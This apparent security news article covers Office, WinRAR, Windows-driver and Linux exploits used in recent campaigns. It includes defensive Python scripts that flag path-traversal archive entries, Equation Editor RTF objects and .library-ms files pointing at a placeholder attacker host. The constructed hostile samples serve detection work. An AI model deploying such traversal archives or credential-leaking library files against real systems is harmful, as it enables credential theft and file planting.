Cybersecurity teams worldwide have observed a surge in sophisticated campaigns exploiting both Windows and Linux vulnerabilities in recent months to achieve unauthorized system access.
These attacks often begin with phishing emails or malicious web content designed to deliver weaponized documents. Once opened, the embedded exploits target unpatched vulnerabilities in commonly used software components, allowing attackers to execute arbitrary code on victim machines.
As organizations struggle to keep pace with patch management, threat actors have intensified their focus on high-impact flaws that remain unaddressed in many environments.
Securelist researchers identified that several long-standing vulnerabilities in Microsoft Office’s Equation Editor continue to be a favorite initial access vector.
CVE-2018-0802 and CVE-2017-11882, both remote code execution flaws in the Equation Editor component, remain heavily exploited despite patches being available for years.
In addition, CVE-2017-0199, a flaw affecting Office and WordPad, provides another path for payload delivery.
These Office exploits are often combined with more recent Windows File Explorer and driver vulnerabilities—such as CVE-2025-24071, which enables NetNTLM credential theft via .library-ms files, and CVE-2024-35250, a ks.sys driver code execution issue—to establish a foothold and escalate privileges.
Beyond Microsoft Office, attackers have also leveraged WinRAR’s archive-handling weaknesses. CVE-2023-38831 and the directory traversal flaw CVE-2025-6218 allow adversaries to place malicious files outside the intended extraction path, hijacking system configurations or dropping persistence backdoors.
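The archive flaws above share one defect class: an entry name that, once joined to the extraction directory, resolves outside it. As an added example (not code from WinRAR, Securelist, or the article), the Python below lists the entries of an archive that would escape the destination without extracting anything. It uses ZIP because Python's standard library has no RAR reader, but the check is on entry names and applies to any archive format; the sample archive and its entry names are constructed for illustration.

```python
"""Check archive entries for path traversal before extraction.

Added example, not code from WinRAR, Securelist, or the article. Works on
entry names only, so nothing is written to disk while triaging.
"""
import io
import posixpath
import re
import zipfile

DRIVE_RE = re.compile(r"^[A-Za-z]:")


def is_path_escape(entry_name: str) -> bool:
    """True if extracting this entry relative to a destination directory would
    write outside it: absolute path, drive letter, or a normalised path that
    still begins with '..' after collapsing 'a/../b' segments."""
    name = entry_name.replace("\\", "/")        # Windows separators count too
    if name.startswith("/") or DRIVE_RE.match(name):
        return True
    norm = posixpath.normpath(name)             # collapses 'x/../y' and './'
    return norm == ".." or norm.startswith("../")


def unsafe_entries(zip_bytes: bytes) -> list:
    """Entry names in a ZIP that fail is_path_escape, without extracting."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [name for name in zf.namelist() if is_path_escape(name)]


def build_sample_archive() -> bytes:
    """Constructed test archive: one benign entry, one that only looks
    suspicious but stays inside, and three that escape the destination."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report/summary.txt", "benign content")
        zf.writestr("report/../notes.txt", "normalises to notes.txt, inside")
        zf.writestr("../../escaped.txt", "escapes via ..")
        zf.writestr("..\\..\\escaped-backslash.txt", "escapes via backslash ..")
        zf.writestr("C:/absolute.txt", "absolute Windows path")
    return buf.getvalue()


if __name__ == "__main__":
    # Triage the constructed archive; a real deployment would read a file
    # from the mail gateway or endpoint quarantine instead.
    for name in unsafe_entries(build_sample_archive()):
        print(f"REJECT {name!r}: would be written outside the extraction directory")
```

Normalising before testing matters: `report/../notes.txt` is legitimate, while `..\..\escaped-backslash.txt` is a traversal even though it contains no forward slash, which is exactly the kind of entry an extractor that only inspects `/`-separated segments lets through.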
On the Linux side, the Dirty Pipe vulnerability (CVE-2022-0847) remains a critical favorite for privilege escalation, while CVE-2019-13272 and CVE-2021-22555 continue to be used to gain root access on unpatched servers.
Infection Mechanism
A particularly insidious infection mechanism combines Office-based delivery with secondary exploitation of system drivers. Securelist analysts noted that attackers craft RTF documents containing shellcode that invokes Equation Editor through OLE objects.
Once the vulnerability triggers, shellcode downloads a two-stage payload: a small loader and a full-featured malware binary.
The loader leverages CVE-2025-24071 to harvest NetNTLM hashes from incoming SMB connections, forwarding them to a C2 server.
The full payload then exploits CVE-2024-35250 to load a malicious driver into kernel space, granting attackers unrestricted code execution.
This dual-exploit chain allows adversaries to bypass user-level defenses and deploy rootkits undetected.
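Two stages of the chain described above leave artefacts in the delivered documents themselves, which is where a defender can intercept them before any exploit fires. As an added example (not code from Securelist or the article), the Python triage script below flags RTF files whose embedded OLE object references the Equation Editor, and flags .library-ms files whose location entry points at a UNC path, the condition that makes Windows Explorer send NetNTLM credentials to a remote host. The sample documents and the host name attacker-host.example are constructed for illustration; the Equation Editor ProgID "Equation.3" and its CLSID are the real registered values.

```python
"""Triage checks for two document-borne stages of the chain described above.

Added example, not code from Securelist or the article. The sample RTF and
.library-ms contents below are constructed; attacker-host.example is a
placeholder host name.
"""
import re
import uuid
import xml.etree.ElementTree as ET

# Equation Editor registers ProgID "Equation.3" and this CLSID; an OLE object
# pointing at either is the carrier used for CVE-2017-11882 / CVE-2018-0802.
EQNEDT_CLSID = uuid.UUID("0002CE02-0000-0000-C000-000000000046")

# RTF stores embedded objects as \object ... {\*\objclass ProgID} {\*\objdata <hex>}
OBJCLASS_RE = re.compile(rb"\\objclass\s*([A-Za-z0-9._]+)")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")
PROGID_RE = re.compile(rb"Equation\.\d")


def rtf_equation_editor_objects(data: bytes) -> list:
    """Findings for OLE objects in an RTF file that reference Equation Editor."""
    findings = []
    if not data.lstrip().startswith(b"{\\rtf"):
        return findings
    for m in OBJCLASS_RE.finditer(data):
        cls = m.group(1).decode("ascii", "replace")
        if cls.lower().startswith("equation"):
            findings.append(f"objclass {cls}")
    for m in OBJDATA_RE.finditer(data):
        try:
            raw = bytes.fromhex(re.sub(rb"\s+", b"", m.group(1)).decode("ascii"))
        except ValueError:
            continue  # not a clean hex blob; skip rather than guess
        # The OLE1 stream in \objdata carries the class name as ASCII ...
        p = PROGID_RE.search(raw)
        if p:
            findings.append(f"objdata ProgID {p.group(0).decode()}")
        # ... and may carry the CLSID in its on-disk (little-endian) layout.
        if EQNEDT_CLSID.bytes_le in raw:
            findings.append("objdata CLSID Equation Editor")
    return findings


def library_ms_remote_locations(xml_text: str) -> list:
    """<url> entries in a .library-ms definition that point at a UNC path.

    A library whose location is \\\\host\\share makes Explorer contact that
    host, which is the NetNTLM leak behind CVE-2025-24071."""
    remote = []
    for el in ET.fromstring(xml_text.encode("utf-8")).iter():
        # Compare the local tag name so the check works with or without the namespace
        if el.tag.rsplit("}", 1)[-1] == "url" and el.text:
            loc = el.text.strip()
            if loc.startswith("\\\\"):
                remote.append(loc)
    return remote


# --- constructed samples (not real malware) ---------------------------------
SAMPLE_RTF = (
    b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}"
    b"{\\*\\objdata 01050000020000000b0000004571756174696f6e2e3300}}}"
)
BENIGN_RTF = b"{\\rtf1 Quarterly figures attached.}"

SAMPLE_LIBRARY_MS = """<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\attacker-host.example\\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""

if __name__ == "__main__":
    for label, hits in [
        ("invoice.rtf (constructed)", rtf_equation_editor_objects(SAMPLE_RTF)),
        ("notes.rtf (constructed)", rtf_equation_editor_objects(BENIGN_RTF)),
        ("docs.library-ms (constructed)", library_ms_remote_locations(SAMPLE_LIBRARY_MS)),
    ]:
        print(f"{label}: {'FLAG ' + str(hits) if hits else 'clean'}")
```

Both checks are cheap enough to run at a mail gateway or on a quarantine share. They deliberately inspect the object's class identifiers rather than any particular shellcode, so they catch the carrier regardless of which Equation Editor bug the payload targets; an RTF that is obfuscated enough to hide `\objclass` will usually still expose the ProgID or CLSID once `\objdata` is hex-decoded.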
In many incidents, once kernel-level control is achieved, attackers install custom C2 frameworks—such as Sliver or Havoc—to maintain persistence.
These implants include in-memory protection to evade antivirus scans and use legitimate Windows services to blend into normal processes.
By chaining publicly known exploits, actors can rapidly move from initial compromise to full system control without writing suspicious files to disk.
Vulnerability Details
CVE | Description | Exploit Type | Affected Platform |
---|---|---|---|
CVE-2018-0802 | RCE in Office Equation Editor | Embedded OLE exploit | Windows |
CVE-2017-11882 | RCE in Office Equation Editor | Embedded OLE exploit | Windows |
CVE-2017-0199 | Control takeover via Office and WordPad | Script-based document exploit | Windows |
CVE-2023-38831 | Improper file handling in WinRAR | Archive code execution | Windows |
CVE-2025-24071 | NetNTLM credential theft via .library-ms files | Credential dumping | Windows |
CVE-2024-35250 | Arbitrary code execution in ks.sys driver | Kernel driver exploit | Windows |
CVE-2022-0847 | Dirty Pipe privilege escalation | Pipe buffer overwrite | Linux |
CVE-2019-13272 | Improper privilege inheritance handling | Privilege escalation | Linux |
CVE-2021-22555 | Heap overflow in Netfilter | Heap-based overflow | Linux |
CVE-2025-6218 | Directory traversal in WinRAR | Archive path manipulation | Windows |
This consolidated view highlights the persistence of older vulnerabilities alongside newer flaws, underscoring the critical need for timely patching and comprehensive defense-in-depth strategies.
Organizations should prioritize updates for both user applications and system components to mitigate the risk of these prevalent exploits in real-world attacks.